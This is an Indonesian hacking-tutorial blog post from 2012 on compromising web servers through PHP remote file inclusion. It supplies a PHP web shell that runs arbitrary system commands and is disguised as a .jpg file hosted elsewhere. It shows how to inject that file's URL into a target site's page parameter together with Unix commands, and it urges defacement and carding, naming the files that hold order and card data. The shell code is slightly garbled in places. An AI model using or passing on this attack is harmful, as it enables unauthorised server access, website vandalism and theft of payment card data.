HACKING SERVER DENGAN PHP INJECTION




1. - Hosting file(Yg gratisan jg banyak. Contoh : Geocities , Ripway, dll)
2. - Lagu2 Linkin Park, Blink 182, My Chemical Romance buat nemenin aksi jahanam kamu



Oke, copy paste script berikut



Code:


<font face=verdana size=7></font>
<center>CMD - SystemCommand

</center><font face=Verdana size=1>
# CMD PHP : 
# Re-DESIGN by : Bagus Hacks A.K.A B-479


<hr></hr>
<font face=Verdana size=1>// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("
$output));
?>
</font>

<hr></hr>
<font face=Verdana size=1></font>
Bagus Hacks | Muslim Hacker | TeaMpOisoN | Anoymous | 
</font>
Kalo udah, save dng nama CMD dan format .jpg . Lalu upload ke hosting kamu. (Yg grtisan jg banyak, udh di bahas di atas) Setelah saya upload, nanti saya akan mendapat URL seperti berikut:
http://www.geocities/n4is3n/cmd.jpg

Setelah itu cari target (Ini membutuhkan kesabaran tingkat tinggi)

Setelah ketemu, contoh:

http://www.target.com/main.php?page=article

Nah, kamu ubah URL-nya jd

.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=<perintah unix="" disini=""></perintah>

Lalu eksekusi URL tsb! contoh:
.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=ls -l

dan liat hasil-nya... browser akan menampilakan semua direktori yg ada di server sesuai perintah UNIX tadi (ls -l adalah perintah untuk melihat isi direktori beserta
permission-nya).

Untuk defacing atau carding, kamu bisa mengexplore lbh jauh lg...

Oke...oke... saya kasih kata kunci-nya:

untuk deface = "index.html, index.php, index.htm"
untuk carding = "orderlog.txt, order.php"

Semua ada di server, tinggal bagaimana cara kamu menemukan-nya :D

so... Happy Hacking!

Penulis : arief iqbal al mustaqin ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel HACKING SERVER DENGAN PHP INJECTION ini dipublish oleh arief iqbal al mustaqin pada hari Minggu, 21 Oktober 2012. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 0 komentar: di postingan HACKING SERVER DENGAN PHP INJECTION
 

0 komentar:

Poskan Komentar